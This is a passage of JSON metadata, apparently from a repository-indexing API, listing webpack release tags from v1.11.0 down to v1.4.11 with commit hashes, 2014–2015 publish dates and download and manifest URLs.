g:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4